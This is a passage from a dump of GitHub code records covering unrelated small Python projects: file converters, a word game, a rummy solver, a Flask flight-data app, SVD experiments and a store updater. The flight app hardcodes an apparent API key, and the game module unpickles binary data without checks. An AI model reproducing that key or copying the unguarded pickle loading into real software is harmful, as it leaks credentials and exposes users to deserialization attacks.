possible: ht2, mat')\n\n args = parser.parse_args()\n\n # Specify the base directory where the script looks for ht2 files recursively\n BASE_DIR = args.path\n\n for (directory, dirnames, filenames) in os.walk(BASE_DIR):\n\n for file_name in filenames:\n\n # check if the file has the ht2 extension\n base_name, ext = os.path.splitext(file_name)\n\n if ext == '.ht2' and args.format == 'ht2':\n convert_ht2(directory, base_name)\n\n if ext == '.mat' and args.format == 'mat':\n convert_mat(directory, base_name)\n","repo_name":"elkaps/single-photon","sub_path":"utils/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34204664540","text":"import pickle\n\n\nclass GameHandler:\n def __init__(self, cards, task):\n self.cards = cards\n self.task = task\n self.is_valid = ''\n self.finished = False\n self.card = self.cards[0]\n self.progress = {}\n for card in self.cards:\n self.progress[card] = {}\n\n def validate_answer(self, answer):\n self.progress[self.card]['attempts'] = self.progress[self.card].get(\n 'attempts', 0) + 1\n if answer.lower() == '':\n self.help_answer()\n elif answer.lower().strip() == self.task.get('answer').lower():\n self.correct_answer()\n if len(self.cards) == 0:\n self.finished = True\n else:\n self.card = self.cards[0]\n elif answer.lower().strip() != self.task.get('answer').lower():\n self.wrong_answer()\n self.task = None\n\n def correct_answer(self):\n self.is_valid = True\n self.progress[self.card]['correct'] = self.progress[self.card].get(\n 'correct', 0) + 1\n self.cards.remove(self.card)\n\n def wrong_answer(self):\n self.is_valid = False\n self.progress[self.card]['wrong'] = self.progress[self.card].get(\n 'wrong', 0) + 1\n if self.progress[self.card].get('attempts') < 3:\n self.cards += [self.cards.pop(0)]\n # else:\n # self.cards.remove(self.card)\n\n def help_answer(self):\n self.is_valid = None\n self.progress[self.card]['help'] = self.progress[self.card].get(\n 'help', 0) + 1\n if self.progress[self.card]['help'] <= 2:\n self.cards.insert(2, self.cards.pop(0))\n # else:\n # self.cards.remove(self.card)\n\n @property\n def serialize(self):\n return {\n 'cards': self.cards,\n 'task': self.task,\n 'card': self.card,\n 'is_valid': self.is_valid,\n 'card_progress': self.progress.get(\n self.card,\n {'attempts': 0, 'help': 0, 'wrong': 0, 'correct': 0}),\n 'game_progress': self.progress,\n 'finished': self.finished\n }\n\n\ndef save_game(game: GameHandler):\n try:\n return pickle.dumps(game)\n except Exception as e:\n raise e\n\n\ndef load_game(binary):\n try:\n return pickle.loads(binary)\n except Exception as e:\n raise e\n","repo_name":"tyevhen/words-guess-game","sub_path":"app/services/game_handler.py","file_name":"game_handler.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27639533927","text":"keys = ['D', 'C', 'H', 'S']\nvals = ['A', '2', '3', '4', '5', '6', '7', '8', '9', 'T', 'J', 'Q', 'K']\n\nthing = open('rummies')\nfirst = thing.readline()\n\nsplit = lambda q: [(x[0], x[1]) for x in q.rstrip().split(', ')]\nsame = lambda x: [(y, suit) for suit in hand for y in hand[suit] if y == x]\nisSet = lambda card: 1 < len(same(card[0])) < 4\nisRun = lambda card, hand: 1 < len(hand[card[1]]) < 4 and inRange(card)\n\ndef inRange(card):\n\tcards = [vals.index(x) for x in hand[card[1]]]\n\n\tfor x in range(len(cards) - 
1):\n\t\t\tif vals.index(card[0]) == cards[x] + 1 == cards[x + 1] - 2:\n\t\t\t\treturn True\n\t\tif cards[x] + 1 != cards[x + 1]:\n\t\t\tbreak\n\telse:\n\t\treturn cards[0] - 1 == vals.index(card[0]) or cards[-1] + 1 == vals.index(card[0])\n\n\ndef numerize(lizst):\n\tdic = {vals.index(x): x for x in lizst}\n\treturn [dic[x] for x in sorted(dic.keys())]\n\ndef sort(lizst):\n\tdic = {x: [] for x in keys}\n\t[dic[x[1]].append(x[0]) for x in lizst]\n\treturn {x: numerize(dic[x]) for x in keys}\n\ndef garbage(hand):\n\tx = [(y, x) for x in keys for y in hand[x] if len(hand[x]) < 3 and len(same(y)) < 3]\n\n\thand[min(x, key = lambda x: vals.index(x[0]))[1]].pop(0)\n\treturn hand\n\nfor line in thing:\n\thand = sort(split(first))\n\tcards = split(line)\n\n\tfor card in cards:\n\t\tif isRun(card, hand) or isSet(card):\n\t\t\thand[card[1]].append(card[0])\n\t\t\thand = {x: numerize(hand[x]) for x in hand}\n\t\t\tgarbage(hand)\n\n\toutput = ''\n\n\tfor c in range(4, 2, -1):\n\t\toutput += ''.join([y + x + ', ' for x in hand for y in hand[x] if len(hand[x]) == c])\n\n\t\tfor (x, key) in [(x, key) for key in hand for x in hand[key]]:\n\t\t\tif len(same(x)) == c:\n\t\t\t\tfor z in same(x):\n\t\t\t\t\toutput += z[0] + z[1] + ', '\n\t\t\t\t\thand[z[1]].remove(z[0])\n\n\tvals.reverse()\n\ttrash = {x: [] for x in vals}\n\n\tkeys.reverse()\n\t[trash[y].append(x) for x in keys for y in hand[x] if not (len(same(y)) > 2 or len(hand[x]) > 2)]\n\toutput += ''.join(x + key + ', ' for x in vals for key in keys if key in trash[x])\n\n\tprint(output[:-2])\n\tvals.reverse()\n\tkeys.reverse()","repo_name":"ReticentIris/ACSL","sub_path":"rummies2.py","file_name":"rummies2.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72800292394","text":"import json\nimport os\n\ndef create_qa_pairs(file_path):\n with open(file_path, 'r', encoding='latin1') as file:\n data = json.load(file)\n\n # List that stores the question-answer pairs\n qa_pairs = []\n\n # Variable that stores the previous message\n previous_message = None\n\n for message in data['messages']:\n # Extract the message information\n sender = message['sender_name'].encode(\"latin1\").decode(\"utf-8\")\n content = message.get('content', '').encode(\"latin1\").decode(\"utf-8\")\n\n # Use messages sent by \"오유성\" as the answers\n if sender == \"오유성\" and previous_message:\n question = previous_message\n answer = content\n qa_pairs.append(f\"질문: {question}\\n답변: {answer}\\n\")\n\n # Store the current message as the previous message for the next loop iteration\n previous_message = content\n\n return qa_pairs\n\n# Find every JSON file inside the folder\nfolder_path = 'C:/Users/OYS/dev/pythonProject/inbox'\nall_qa_pairs = []\n\nfor root, dirs, files in os.walk(folder_path):\n for file_name in files:\n if file_name.endswith('.json'):\n file_path = os.path.join(root, file_name)\n qa_pairs = create_qa_pairs(file_path)\n all_qa_pairs.extend(qa_pairs)\n\n# Save every question-answer pair to a text file\nwith open('qa_pairs.txt', 'w', encoding='utf-8') as file:\n for pair in all_qa_pairs:\n file.write(pair)\n","repo_name":"oyshallo562/NLP_GPT2_Custom","sub_path":"readjson2.py","file_name":"readjson2.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38879922286","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('forum', '0001_initial'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='forumuser',\n 
old_name='avater',\n new_name='avatar',\n ),\n migrations.RenameField(\n model_name='forumuser',\n old_name='self_info',\n new_name='self_intro',\n ),\n migrations.RenameField(\n model_name='forumuser',\n old_name='update',\n new_name='updated',\n ),\n migrations.AlterField(\n model_name='forumuser',\n name='douban',\n field=models.CharField(max_length=200, null=True, blank=True),\n ),\n migrations.AlterField(\n model_name='forumuser',\n name='github',\n field=models.CharField(max_length=200, null=True, blank=True),\n ),\n migrations.AlterField(\n model_name='forumuser',\n name='twitter',\n field=models.CharField(max_length=200, null=True, blank=True),\n ),\n ]\n","repo_name":"onegithuber/myforum","sub_path":"forum/migrations/0002_auto_20151202_2331.py","file_name":"0002_auto_20151202_2331.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71132565994","text":"name=[]\r\nmarks=[]\r\nfor i in range(5):\r\n n=input(\"Enter the name: \")\r\n m=int(input(\"Enter the marks: \"))\r\n name.append(n)\r\n marks.append(m)\r\nh=max(marks)\r\nm=min(marks)\r\nprint(\"Highest marks are=\",h)\r\nprint(\"Lowest marks are=\",m)\r\nfor i in range(5):\r\n if h==marks[i]:\r\n print(\"Student having highest marks is \",name[i])\r\n if m==marks[i]:\r\n print(\"Student having lowest marks is\",name[i])\r\n","repo_name":"Kunal352000/python_program","sub_path":"143.py","file_name":"143.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27085628051","text":"from flask import Flask, render_template, redirect, jsonify, json\nfrom flask_pymongo import PyMongo\nimport pymongo\nimport requests\nimport os\n\nfrom collections import defaultdict, Counter\n\n\napi_key = \"9a7cdb-87fe76\"\n# This allows \"requests\" module to access local server\n# os.environ['NO_PROXY'] = '127.0.0.1'\n\n# Create an instance of Flask\napp = Flask(__name__)\n\n# Use PyMongo to establish Mongo connection\nmongo = PyMongo(app, uri=\"mongodb://localhost:27017/flight_app\")\n\n\n# to be used as a global object\nairport_url = 'http://aviation-edge.com/v2/public/airportDatabase'\nap_params = {'key': api_key}\nairport_json = requests.get(airport_url, params=ap_params).json()\n\n# for quick search: O(1)\nairport_ref = {}\nairport_coords = {}\nfor airport in airport_json:\n airport_ref[airport.get('codeIataAirport')\n ] = airport.get('codeIso2Country')\n airport_coords[airport.get('codeIataAirport')] = [float(airport.get('longitudeAirport')),\n float(airport.get('latitudeAirport'))]\n\n\n# Route to render index.html template using data from Mongo\n@app.route(\"/\")\ndef home():\n\n # Find one record of data from the mongo database\n #\n\n # Return template and data\n # render_template(\"index.html\", vacation=destination_data)\n return render_template(\"index.html\")\n\n# Route that will trigger the scrape function\n@app.route(\"/store-data\")\ndef store_data():\n # get a dataset from timetable API with certain parameters\n timetable_url = 'http://aviation-edge.com/v2/public/timetable'\n tt_params = {'key': api_key,\n # 'iataCode': 'DEN'\n 'codeshared': 'Null',\n 'type': 'arrival'\n }\n timetable_json = requests.get(timetable_url, params=tt_params).json()\n\n # get a airport information dataset to join with the dataset from above\n # in order to filter out non-US airports\n # airport_url = 'http://aviation-edge.com/v2/public/airportDatabase'\n # 
ap_params = {'key': api_key}\n # airport_json = requests.get(airport_url, params=ap_params).json()\n\n # # for quick search: O(1)\n # airport_ref = {}\n # for airport in airport_json:\n # airport_ref[airport.get('codeIataAirport')] = airport.get('codeIso2Country')\n\n # US 61 busiest airports from wikipedia\n major_airports = {'ABQ', 'ANC', 'ATL', 'AUS', 'BDL', 'BHM', 'BNA', 'BOS', 'BUF', 'BUR', 'BWI', 'CLE', 'CLT', 'CMH', 'CVG', 'DAL', 'DCA', 'DEN', 'DFW', 'DTW', 'EWR', 'FLL', 'HNL', 'HOU', 'IAD', 'IAH', 'IND', 'JAX', 'JFK',\n 'LAS', 'LAX', 'LGA', 'MCI', 'MCO', 'MDW', 'MIA', 'MKE', 'MSP', 'MSY', 'OAK', 'OGG', 'OMA', 'ONT', 'ORD', 'PBI', 'PDX', 'PHL', 'PHX', 'PIT', 'RDU', 'RSW', 'SAN', 'SAT', 'SEA', 'SFO', 'SJC', 'SLC', 'SMF', 'SNA', 'STL', 'TPA'}\n\n results = []\n for schedule in timetable_json:\n\n depart_airport = schedule.get('departure').get('iataCode')\n arrival_airport = schedule.get('arrival').get('iataCode')\n\n if (airport_ref[depart_airport] == 'US') and (airport_ref[arrival_airport] == 'US'):\n\n if (depart_airport in major_airports) and (arrival_airport in major_airports):\n\n for airport in airport_json:\n if depart_airport == airport.get('codeIataAirport'):\n schedule['departLat'] = float(\n airport.get('latitudeAirport'))\n schedule['departLon'] = float(\n airport.get('longitudeAirport'))\n schedule['departAirportTimezone'] = airport.get(\n 'timezone')\n schedule['departCityCode'] = airport.get(\n 'codeIataCity')\n\n elif arrival_airport == airport.get('codeIataAirport'):\n schedule['arrivalLat'] = float(\n airport.get('latitudeAirport'))\n schedule['arrivalLon'] = float(\n airport.get('longitudeAirport'))\n schedule['arrivalAirportTimezone'] = airport.get(\n 'timezone')\n schedule['arrivalCityCode'] = airport.get(\n 'codeIataCity')\n\n results.append(schedule)\n\n # insert to the Mongo database\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n mydb = myclient[\"flight_app\"]\n mycol = mydb[\"timetable\"]\n # x = mycol.insert_many(result_json)\n\n mycol.create_index([(\"arrival\", pymongo.ASCENDING),\n (\"departure\", pymongo.ASCENDING),\n (\"airline\", pymongo.ASCENDING),\n (\"flight\", pymongo.ASCENDING),\n (\"codeshared\", pymongo.ASCENDING),\n (\"type\", pymongo.ASCENDING)\n ], unique=True)\n count_insert = 0\n count_update = 0\n for data in results:\n\n try:\n # assuming that only no codeshared flight is a real one.\n data_insertion = mycol.insert_one(data)\n\n if (data_insertion.inserted_id):\n count_insert += 1\n\n except: # if the duplicate found (status would be different)\n # if 'status' is different to an existing document\n\n cursor = mycol.find({\"arrival\": data.get(\"arrival\"),\n \"departure\": data.get(\"departure\"),\n \"airline\": data.get(\"airline\"),\n \"flight\": data.get(\"flight\"),\n \"codeshared\": data.get(\"codeshared\")},\n {\"_id\": 1})\n status = {\"$set\": {\"status\": data.get(\"status\")}}\n\n for update in cursor:\n data_update = mycol.update_one(update, status)\n\n if (data_update.modified_count != 0):\n count_update += data_update.modified_count\n\n return f\"Posting Done (insert: {count_insert} / update: {count_update} records)\"\n\n\n@app.route(\"/get-storeddata\")\ndef get_storeddata():\n\n results = []\n data = mongo.db.timetable.find({}, {\"_id\": 0})\n\n for schedule in data:\n # schedule['_id'] = str(schedule['_id'])\n results.append(schedule)\n\n return jsonify(results)\n\n\n# # Route that will trigger the scrape function\n# @app.route(\"/post-timetable\")\n# def post_timetable():\n# # Get dataset for both 
arrival and departure\n# base_url = 'http://aviation-edge.com/v2/public/timetable'\n# params = {'key': api_key,\n# # 'iataCode': 'DEN'\n# 'codeshared': 'Null',\n# 'type': 'arrival'\n# }\n\n# result_json = requests.get(base_url, params=params).json()\n\n# # insert to the Mongo database\n# myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n# mydb = myclient[\"flight_app\"]\n# mycol = mydb[\"timetable\"]\n# # x = mycol.insert_many(result_json)\n\n# mycol.create_index([(\"arrival\", pymongo.ASCENDING),\n# (\"departure\", pymongo.ASCENDING),\n# (\"airline\", pymongo.ASCENDING),\n# (\"flight\", pymongo.ASCENDING),\n# (\"codeshared\", pymongo.ASCENDING),\n# (\"type\", pymongo.ASCENDING)\n# ], unique=True)\n\n# for data in result_json:\n# # if data.get('codeshared') is None:\n# try:\n# # assuming that only no codeshared flight is a real one.\n# mycol.insert_one(data)\n# except: # if the duplicate found (status would be different)\n# # if 'status' is different to an existing document\n\n# cursor = mycol.find({\"arrival\": data.get(\"arrival\"),\n# \"departure\": data.get(\"departure\"),\n# \"airline\": data.get(\"airline\"),\n# \"flight\": data.get(\"flight\"),\n# \"codeshared\": data.get(\"codeshared\")},\n# {\"_id\": 1})\n# status = {\"$set\": {\"status\": data.get(\"status\")}}\n\n# for update in cursor:\n# mycol.update_one(update, status)\n\n# return f\"Posting Done ({len(result_json)} records)\"\n\n\n# @app.route(\"/get-timetable\")\n# def get_timetable():\n\n# results = []\n# timetable = mongo.db.timetable.find({}, {\"_id\": 0})\n\n# for schedule in timetable:\n# # schedule['_id'] = str(schedule['_id'])\n# results.append(schedule)\n\n# return jsonify(results)\n\n\n# Trim the stored data to easily visualize the arcs between source and target airports\n@app.route(\"/summarize-timetable\")\ndef summarize_timetable():\n\n resp_json = requests.get(\"http://127.0.0.1:5000/get-storeddata\").json()\n\n # results is a dictionary of dictionaries\n counts = {} # defaultdict(Counter)\n\n for flight in resp_json:\n departure_airport = flight.get('departure').get('iataCode')\n arrival_airport = flight.get('arrival').get('iataCode')\n route = f'{departure_airport}-{arrival_airport}'\n counts[route] = counts.get(route, 0) + 1\n\n results = []\n for route, flights in counts.items():\n departure = route.split('-')[0]\n arrival = route.split('-')[1]\n\n results.append({\n 'departure': departure,\n 'departure_coords': airport_coords[departure],\n 'arrival': arrival,\n 'arrival_coords': airport_coords[arrival],\n 'flights': flights\n })\n\n results = sorted(results, key=lambda x: x['departure'])\n\n return jsonify(results)\n\n\n@app.route(\"/post-flighttracker\")\ndef post_flight_tracker():\n\n base_url = 'http://aviation-edge.com/v2/public/flights'\n params = {'key': api_key,\n 'depIata': 'DEN'\n }\n\n result_json = requests.get(base_url, params=params).json()\n\n # insert to the Mongo database\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n mydb = myclient[\"flight_app\"]\n mycol = mydb[\"flighttracker\"]\n # x = mycol.insert_many(result_json)\n\n mycol.create_index([(\"aircraft\", pymongo.ASCENDING),\n (\"airline\", pymongo.ASCENDING),\n (\"arrival\", pymongo.ASCENDING),\n (\"departure\", pymongo.ASCENDING),\n (\"flight\", pymongo.ASCENDING),\n (\"geography\", pymongo.ASCENDING),\n (\"speed\", pymongo.ASCENDING),\n (\"status\", pymongo.ASCENDING),\n (\"system\", pymongo.ASCENDING)\n ], unique=True)\n\n for data in result_json:\n try:\n mycol.insert_one(data)\n except:\n pass\n\n 
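The try/except around insert_one here is a common Mongo insert-or-refresh idiom: the unique compound index makes duplicate schedules raise on insert, and the handler falls back to updating only the volatile field. A stripped-down sketch of the same pattern, assuming a local mongod; the demo database and field names are made up:

import pymongo
from pymongo.errors import DuplicateKeyError

col = pymongo.MongoClient("mongodb://localhost:27017/")["demo"]["timetable"]
col.create_index([("flight", pymongo.ASCENDING),
                  ("departure", pymongo.ASCENDING)], unique=True)

doc = {"flight": "UA123", "departure": "DEN", "status": "landed"}
try:
    col.insert_one(dict(doc))  # first sighting: insert a copy
except DuplicateKeyError:      # repeat sighting: refresh the volatile field
    col.update_one({"flight": doc["flight"], "departure": doc["departure"]},
                   {"$set": {"status": doc["status"]}})

When every field should be refreshed, update_one(filter, {"$set": doc}, upsert=True) collapses the try/except into one call; the split form is useful when inserts and updates touch different fields, and catching DuplicateKeyError explicitly is safer than a bare except.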
return \"Posting Done\"\n\n\n@app.route(\"/get-flighttracker\")\ndef get_flight_tracker():\n\n results = []\n flights = mongo.db.flighttracker.find()\n\n for flight in flights:\n flight['_id'] = str(flight['_id'])\n results.append(flight)\n\n return jsonify(results)\n\n\n@app.route(\"/post-airportinfo\")\ndef post_airport():\n\n base_url = 'http://aviation-edge.com/v2/public/airportDatabase'\n params = {'key': api_key}\n\n result_json = requests.get(base_url, params=params).json()\n\n # insert to the Mongo database\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n mydb = myclient[\"flight_app\"]\n mycol = mydb[\"airport\"]\n\n mycol.create_index([(\"airportId\", pymongo.ASCENDING),\n (\"nameAirport\", pymongo.ASCENDING),\n (\"codeIataAirport\", pymongo.ASCENDING),\n (\"codeIcaoAirport\", pymongo.ASCENDING)\n ], unique=True)\n\n for data in result_json:\n # if (data.get('nameCountry') == 'United States'):\n try:\n mycol.insert_one(data)\n except:\n pass\n\n return \"Posting Done\"\n\n\n@app.route(\"/get-airportinfo\")\ndef get_airport():\n\n results = []\n airports = mongo.db.airport.find()\n\n for airport in airports:\n airport['_id'] = str(airport['_id'])\n results.append(airport)\n\n return jsonify(results)\n\n\n@app.route(\"/post-cityinfo\")\ndef post_cities():\n\n base_url = 'https://aviation-edge.com/v2/public/cityDatabase'\n params = {'key': api_key}\n\n result_json = requests.get(base_url, params=params).json()\n\n # insert to the Mongo database\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n mydb = myclient[\"flight_app\"]\n mycol = mydb[\"cities\"]\n\n mycol.create_index([(\"cityId\", pymongo.ASCENDING),\n (\"nameCity\", pymongo.ASCENDING),\n (\"codeIataCity\", pymongo.ASCENDING),\n (\"codeIso2Country\", pymongo.ASCENDING)\n ], unique=True)\n\n for data in result_json:\n try:\n mycol.insert_one(data)\n except:\n pass\n\n return \"Posting Done\"\n\n\n@app.route(\"/get-cityinfo\")\ndef get_cities():\n\n results = []\n cities = mongo.db.cities.find()\n\n for city in cities:\n city['_id'] = str(city['_id'])\n results.append(city)\n\n return jsonify(results)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"ktung1189/Project_Flight-master","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16278138700","text":"#!/usr/bin/env python\nimport unittest\nimport lief\nimport logging\nimport io\nfrom io import open as io_open\nfrom unittest import TestCase\nfrom utils import get_sample\n\nfrom lief import Logger\nLogger.set_level(lief.LOGGING_LEVEL.WARNING)\n\nclass TestPythonApi(TestCase):\n\n def setUp(self):\n self.logger = logging.getLogger(__name__)\n\n def test_io(self):\n lspath = get_sample('ELF/ELF64_x86-64_binary_ls.bin')\n\n ls = lief.parse(lspath)\n self.assertIsNotNone(ls.abstract.header)\n\n with io_open(lspath, 'r') as f:\n ls = lief.parse(f)\n self.assertIsNotNone(ls.abstract.header)\n\n with io_open(lspath, 'rb') as f:\n ls = lief.parse(f)\n self.assertIsNotNone(ls.abstract.header)\n\n with io_open(lspath, 'rb') as f:\n ls = lief.ELF.parse(f)\n self.assertIsNotNone(ls.abstract.header)\n\n with io_open(get_sample('PE/PE64_x86-64_binary_HelloWorld.exe'), 'rb') as f:\n binary = lief.PE.parse(f)\n self.assertIsNotNone(binary.abstract.header)\n\n with io_open(get_sample('MachO/MachO64_x86-64_binary_dd.bin'), 'rb') as f:\n binary = lief.MachO.parse(f)[0]\n 
self.assertIsNotNone(binary.abstract.header)\n\n with open(lspath, 'rb') as f: # As bytes\n ls = lief.parse(f.read())\n self.assertIsNotNone(ls.abstract.header)\n\n with open(lspath, 'rb') as f: # As io.BufferedReader\n ls = lief.parse(f)\n self.assertIsNotNone(ls.abstract.header)\n\n with open(lspath, 'rb') as f: # As io.BytesIO object\n bytes_stream = io.BytesIO(f.read())\n self.assertIsNotNone(bytes_stream)\n\n\nif __name__ == '__main__':\n\n root_logger = logging.getLogger()\n root_logger.setLevel(logging.DEBUG)\n\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n root_logger.addHandler(ch)\n\n unittest.main(verbosity=2)\n","repo_name":"JimmyJones97/Analysis","sub_path":"app/src/main/cpp/LIEF-0.10.1/tests/api/test_python.py","file_name":"test_python.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"17016245196","text":"import scipy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.sparse.linalg import svds\nfrom fire import Fire\nfrom tqdm import tqdm\nfrom types import SimpleNamespace\nimport pandas as pd\nimport signal, sys, time\n\nterminate = False\n\n\ndef signal_handling(signum, frame):\n global terminate\n terminate = True\n # print(terminate)\n\n\ndef randomizedSVD(A, c=10, rank=10):\n # Drineas et. al\n m, n = A.shape\n fnorm = np.linalg.norm(A)\n\n colprobs = np.array([np.linalg.norm(col) ** 2 / fnorm**2 for col in A.T])\n colidx = np.random.choice(range(n), c, p=colprobs)\n\n B = A[:, colidx]\n for i in range(c):\n B[:, i] = B[:, i] / np.sqrt(colprobs[i] * c)\n\n U, Sigma, Vt = svds(B, k=rank)\n\n # get the V for svd of A\n V = A.T @ U[:, :rank] # (V Sigma U^T) @ U = V @ Sigma\n # normalize\n for i in range(V.shape[1]):\n V[:, i] = V[:, i] / np.linalg.norm(V[:, i])\n\n return U, Sigma, V\n\n\ndef relerr(Mrhat, Mr, niters=1000):\n # power method for ||Mrhat Mrhat.T - Mr Mr.T|| and ||Mr Mr.T||\n x = np.random.rand(Mrhat.shape[0])\n x = x / np.linalg.norm(x)\n\n t = np.random.rand(Mr.shape[0])\n t = t / np.linalg.norm(t)\n\n for i in range(niters):\n # for ||Mrhat Mrhat.T - Mr Mr.T||\n y = Mr.T @ x\n y = Mr @ y\n\n z = Mrhat.T @ x\n z = Mrhat @ z\n\n x = z - y\n x = x / np.linalg.norm(x) # for || Mrhat Mrhat.T - Mr Mr.T ||\n\n # for ||Mr Mr.T||\n t = Mr.T @ t\n t = Mr @ t\n t = t / np.linalg.norm(t)\n\n return np.linalg.norm(Mrhat @ (Mrhat.T @ x) - Mr @ (Mr.T @ x)) / np.linalg.norm(\n Mr @ (Mr.T @ t)\n )\n\n\ndef approximate(r=10):\n global terminate\n m = 1000\n n = 100000\n r = r\n\n X = scipy.linalg.orth(np.random.rand(m, m))\n Y = scipy.linalg.orth(np.random.rand(n, m))\n D = np.zeros((m, m))\n for i in range(m):\n D[i, i] = r - i + 1 if i <= r else 4e-3\n\n A = X @ D @ Y.T\n\n res = SimpleNamespace(**{\"cU\": [], \"cV\": [], \"eU\": [], \"eV\": []})\n ntrials = 10\n\n # for V\n pbar = tqdm(range(50, 1000, 50), colour=\"GREEN\")\n for c in pbar:\n if c<=r: continue\n avg = 0\n for _ in tqdm(range(ntrials), colour=\"RED\", leave=False):\n V, S, U = randomizedSVD(A.T, c=c, rank=r)\n Vr = Y[:, :r]\n Vrhat = V\n avg += relerr(Vrhat, Vr)\n\n e = avg / ntrials\n res.cV.append(c)\n res.eV.append(e)\n pbar.set_postfix({\"cV\": c, \"eV\": e})\n\n if terminate:\n print('terminating V')\n break\n\n sns.lineplot(x=res.cV, y=res.eV)\n plt.xlabel(\"cV\")\n plt.ylabel(\"eV\")\n plt.savefig(f\"plots/r{r}v.png\")\n\n # for U\n pbar = tqdm(range(100, 5000, 100), colour=\"GREEN\")\n for c in pbar:\n if c<=r: continue\n avg = 0\n for _ in 
tqdm(range(ntrials), colour=\"RED\", leave=False):\n U, S, V = randomizedSVD(A, c=c, rank=r)\n Urhat = U\n Ur = X[:, :r]\n avg += relerr(Urhat, Ur)\n\n e = avg / ntrials\n res.cU.append(c)\n res.eU.append(e)\n pbar.set_postfix({\"cU\": c, \"eU\": e})\n\n if terminate:\n print('terminating U')\n break\n\n plt.clf()\n sns.lineplot(x=res.cU, y=res.eU)\n plt.xlabel(\"cU\")\n plt.ylabel(\"eU\")\n plt.savefig(f\"plots/r{r}u.png\")\n\n pd.DataFrame({\"cU\": res.cU, \"eU\": res.eU}).to_csv(f\"results/r{r}U.csv\")\n pd.DataFrame({\"cV\": res.cV, \"eV\": res.eV}).to_csv(f\"results/r{r}V.csv\")\n\n\nif __name__ == \"__main__\":\n signal.signal(signal.SIGINT, signal_handling)\n sns.set_theme()\n Fire(approximate)\n","repo_name":"sampadbm/sampadbm.github.io","sub_path":"notes/ee546-mathematics-of-high-dimensional-data/hw3/q2/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8186000091","text":"# -*- coding: utf-8 -*-\n\n\"\"\"YoStore operations package.\"\"\"\n\nfrom flask import current_app\nfrom mongoengine import MultipleObjectsReturned, DoesNotExist\n\nfrom .accounts import get_user, update_user\nfrom .core import cache\nfrom .errors import APIError\nfrom .helpers import iso8601_to_usec\nfrom .models import YoStore, StoreCategory, WatchPromo\n\ndef update_yo_store(store_json):\n\n discarded = []\n upserted = []\n for i, item in enumerate(store_json):\n name = item.get('name')\n region = item.get('region')\n \n if not (item.get('name') and item.get('region')):\n message = 'Tried to update with incomplete information: %s %s.'\n message = message % (name, region)\n current_app.log_error(message)\n discarded.append(item)\n continue\n store_item = _get_store_item(name, region)\n if not store_item:\n message = 'Tried to update %s %s but multiple objects were returned'\n message = message % (name, region)\n current_app.log_error(message)\n discarded.append(item)\n continue\n\n is_official = item.get('isofficial')\n is_official = bool(is_official) or False\n in_carousel = bool(item.get('isfeatured')) or False\n needs_location = bool(item.get('needslocation')) or False\n added_at = item.get('datecreated') or None\n try:\n added_at = iso8601_to_usec(added_at)\n except Exception as err:\n message = 'Error converting datecreated for %s %s'\n message = message % (name, region)\n current_app.log_error(message)\n username = item.get('username') or None\n if username:\n yoall_limit = item.get('yoall_limit')\n _update_user_in_store(username, True, yoall_limit)\n screenshots = item.get('screenshots', '').split(',')\n screenshots = [s.strip() for s in screenshots if s.strip()]\n categories = item.get('category', '').split(',')\n categories = [c.strip() for c in categories if c.strip()]\n\n store_item.rank = i\n store_item.description = item.get('sendsyowhen')\n store_item.category = categories or None\n store_item.username = username\n store_item.url = item.get('url') or None\n store_item.is_official = is_official\n store_item.added_at = added_at\n store_item.carousel_picture = item.get('carouselpicture') or None\n store_item.in_carousel = in_carousel\n store_item.needs_location = needs_location\n store_item.profile_picture = item.get('profilepicture') or None\n store_item.featured_screenshots = screenshots or None\n store_item.name = name\n store_item.region = region\n store_item.save()\n\n upserted.append(store_item)\n\n deleted = YoStore.objects(id__nin=[str(u.id) for u in upserted])\n 
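The randomizedSVD routine above follows the Drineas et al. recipe: sample c columns with probability proportional to their squared norms, rescale each by 1/sqrt(c·p_i), and take the SVD of the thin sketch. A compact self-check with made-up sizes; the test matrix is exactly rank r, so projecting onto the sampled left singular vectors should reproduce it almost perfectly:

import numpy as np
from scipy.sparse.linalg import svds

rng = np.random.default_rng(0)
m, n, r, c = 200, 2000, 5, 50

A = rng.standard_normal((m, r)) @ rng.standard_normal((r, n))  # rank-r matrix

# Column-sampling probabilities proportional to squared column norms.
probs = np.linalg.norm(A, axis=0) ** 2 / np.linalg.norm(A) ** 2
cols = rng.choice(n, size=c, p=probs)
B = A[:, cols] / np.sqrt(c * probs[cols])  # rescaled column sketch

U, s, _ = svds(B, k=r)
approx = U @ (U.T @ A)  # project A onto the sampled left singular space
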